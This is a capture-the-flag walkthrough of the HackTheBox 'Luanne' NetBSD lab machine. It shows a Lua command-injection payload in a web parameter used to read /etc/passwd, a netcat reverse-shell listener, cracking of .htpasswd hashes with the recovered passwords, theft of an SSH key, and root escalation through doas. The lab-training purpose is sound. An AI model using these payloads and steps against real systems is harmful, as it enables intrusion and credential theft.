Luanne HackTheBox WalkThrough
This is Luanne HackTheBox machine walkthrough. In this writeup, I have demonstrated step-by-step how I rooted to Luanne HTB
machine. Before starting let us know something about this machine. It is a NetBSD box
(which I came to know after I got into the box) with IP address 10.10.10.218
and difficulty easy
assigned by its maker. First of all, connect your PC with HackTheBox VPN
and make sure your connectivity with Luanne
machine by pinging its IP 10.10.10.218. If all goes correct then start hacking.
As usual, I started by scanning the machine. Used Nmap
[a port scanner] for this task and this time I have used an additional nmap switch -O
for finding the Operating System
as we are not aware of its OS prior. The result is below-
Scanning
$ sudo nmap -sC -sV -O -oN launne.nmap 10.10.10.218
Nmap
found port 22
, 80
and 9001
as open. But it didn’t find the OS and even it didn’t guess its name. Anyway, we will find its name
and version
once we will be inside the box. For now let us enumerate on port 22, 80 and 9001. OpenSSH 8.0
is running on port 22 and its banner also revealed the Operating System name which is NetBSD
. So here we came to know that OS of Luanne machine is NetBSD. SSH will be helpful once we get some credentials in further enumeration.
Let us dig deeper into different services
of remaining ports. Nginx 1.19
web server is running on port 80
and Medusa 1.12
web server is running over port 9001
. Since web servers are running over ports 80 and 9001 so we should have some websites running over URLs http://10.10.10.218 & http://10.10.10.218:9001. Ongoing to these URLs found login page
on both of them like we have in tomcat web server. If you analyze nmap report deeply you will find that nmap script http-robots.txt
revealed a folder weather
at port 80
which can be accessed at URL http://10.10.10.218/weather/.
When I visited this URL it gave me 404 - Not Found
error. Then I brute forced
for files and folders using $dirsearch
(a directory and file bruteforcer written in python) and wordlist directory-list-1.0.txt
(this wordlist can be found at directory /usr/share/wordlists/dirbuster/ in Kali & Parrot)
Directory Bruteforcing
$ sudo dirsearch -u http://10.10.10.218/weather/ -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt -e all -t 40 | tee big.out
Directory bruteforcing revealed a file forecast
. After accessing this file at URL http://10.10.10.218/weather/forecast got some message inside JSON format
revealing a parameter city with its value list viz. city=list
. When I accessed the URL got information about different cities.
After some enumeration
and fuzzing
got error revealing that this website is using Lua
programming language. Check this URL for error http://10.10.10.218/weather/forecast?city=London‘.
Since it is using Lua language so I fuzzed
the URL for some Lua strings
and found that if we append ')os.execute("whoami")
at the end of the URL http://10.10.10.218/weather/forecast?city=London it executes OS command on Luanne machine. I think this is the reason this machine is named Luanne
because here we are able to execute code via Lua
statement and Luanne also contains Lua
word. Let us confirm OS command execution
by checking /etc/passwd
file of Luanne machine.
Confirming OS Command Execution
Open following URL in browser to confirm code execution on Luanne machine.
http://10.10.10.218/weather/forecast?city=London%27)os.execute(%22cat%20/etc/passwd%22)–
We have successfully confirmed remote code execution
on Luanne machine. Let us get user shell
on our local machine using one liner shellcode. I have used $nc
one liner. You can found others at Pentestmonkey.
Getting User Shell
To get reverse shell first of all start netcat
listener on your Kali machine and execute the following URL in the browser
. You will get shell.
$ rlwrap nc -nvlp 1234
$ whoami && id
We have got user shell as user _httpd
. The home folder of this user i.e., current folder contains a hidden file .htpasswd
. After listing the contents of this file found a password hash
of user webapi_user
.
$ ls -la
$ cat .htpasswd
webapi_user
: $1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0
Let us identify the type of this hash so that we can crack it using $
hashcat
(an offline password cracker).
$ hash-identifier
~$1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0
hash-identifier
identified this hash as MD5 (Unix)
. Let us crack it using wordlist rockyou.txt
. rockyou.txt
file can be found inside the directory /usr/share/wordlists/
of Kali and Parrot OS.
Cracking Hash 1 using Hashcat
$ hashcat -m 500 -a 3 '$1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0' /usr/share/wordlists/rockyou.txt
$ hashcat -m 500 -a 3 '$1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0' /usr/share/wordlists/rockyou.txt --show
Hashcat
has successfully cracked the hash and the cracked password is iamthebest
. So we have the credential webapi_user
: iamthebest
. When I tried to SSH
using this credential it failed. After some enumeration found that port 3000
& 3001
are listening locally.
When tried to access service on port 3001
via the URL http://127.0.0.1:3001 got 401 unauthorized
error. So used the credential webapi_user
: iamthebest
to access the service and found that we could easily logged in, and this time didn’t get any access denied permission.
$ curl http://127.0.0.1:3001
$ curl -u 'webapi_user':'iamthebest' http://127.0.0.1:3001
After some further enumeration got id_rsa
key of user r.michaels
inside its home folder using $curl
command. This is somewhat different because normally id_rsa
file is present inside the .ssh
folder of user’s home directory and can be accessed by that user & root user only. But, here it can be accessed from a webserver running locally
. So this file must be present inside some type of public_html
folder. Don’t know exactly what is the folder name in which it is present until I pawned the box.
$ curl -u 'webapi_user':'iamthebest' http://127.0.0.1:3001/~r.michaels/id_rsa
We have got SSH private key
. Let us SSH into Luanne machine using this key after changing its permission.
Getting User Shell using SSH
$ vi id_rsa
$ chmod 400 id_rsa
$ ssh -i id_rsa [email protected]
$ whoami && id
We are now logged in as user r.michaels
. Let us capture user flag.
Capture User Flag
$ cat user.txt
Privilege Escalation
To escalate privilege to root we have to first find a privilege escalation vector
using which we can perform privilege escalation. For this I ran linpeas.sh
(a post exploitation enumeration script) but linpeas didn’t find any valid PrivEsc vector. So I started to do manual enumeration
on the box. After spending some times on the box found an encrypted
file devel_backup-2020-09-16.tar.gz.enc
inside the directory /home/r.michaels/backups/
. Didn’t know how to extract this file. If it would be .gz
or .g2z
we would use $tar
tool to extract but it is .enc
extension file. After some googling found tool $netpgp
that can decrypt this file. Check this for more info.
Finding PrivEsc Vector
$ ls -la /home/r.michaels/backups/
To extract this file I simply copied this file into /tmp/
folder and extracted the file using the following command. When it asks for password enter the password iamthebest
.
$ cd /tmp/
$ netpgp --decrypt /home/r.michaels/backups/devel_backup-2020-09-16.tar.gz.enc --output=devel_backup-2020-09-16.tar.gz
$ tar -xf devel_backup-2020-09-16.tar.gz
$ cat devel-2020-09-16/www/.htpasswd
After extracting this file found another hash of user webapi_user
: $1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu.
. It is again md5 (Unix)
hash you can see the result of hash-identifier
.
$ hash-identifier
~$1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu.
After cracking this hash using hashcat I found the password littlebear
. Then I tried to change the user to root using $doas
command of NetBSD and I could easily login as root
. So here our PrivEsc vector is Privilege Escalation using Credential Dumping
.
Cracking Hash 2 using Hashcat
$ hashcat -m 500 -a 3 '$1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu.' /usr/share/wordlists/rockyou.txt
$ hashcat -m 500 -a 3 '$1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu.' /usr/share/wordlists/rockyou.txt --show
Let us change the user to root
user using $doas
command. $doas
command in NetBSD is same as $sudo
command in Linux OS. It executes command as other user. For more info check this link from FreeBSD.org.
$ doas -u root /bin/sh
~littlebear
# whoami && id
Capture Root Flag
Let us capture root flag.
# cat /root/root.txt
This was how I rooted to Luanne HackTheBox machine. Learnt a lot after rooting this box. Hope you have also learnt some new things from this box walkthrough. Thanks for reading this writeup. For any query and suggestion feel free to write us at [email protected].